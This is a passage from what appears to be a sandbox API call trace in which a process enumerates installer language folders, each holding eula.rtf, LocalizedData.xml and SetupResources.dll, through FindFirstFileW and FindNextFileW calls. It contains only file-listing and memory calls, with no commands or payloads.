ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0196.020] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.020] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.021] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.021] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.021] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.021] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0196.021] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.021] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0196.021] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604278 [0196.021] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.021] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.022] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.022] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.022] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.022] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0196.022] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.022] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0196.022] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604978 [0196.030] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.030] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.030] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.030] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.030] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.031] FindClose (in: hFindFile=0x604978 | out: hFindFile=0x604978) returned 1 [0196.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.031] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0196.032] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0196.034] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.034] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.034] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.034] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.034] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.034] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0196.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.035] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0196.035] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.037] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.037] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.037] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.037] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.037] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.037] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.038] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0196.038] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604238 [0196.039] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.039] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.039] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.039] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.039] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.039] FindClose (in: hFindFile=0x604238 | out: hFindFile=0x604238) returned 1 [0196.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.039] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0196.040] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604238 [0196.042] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.042] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.042] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, 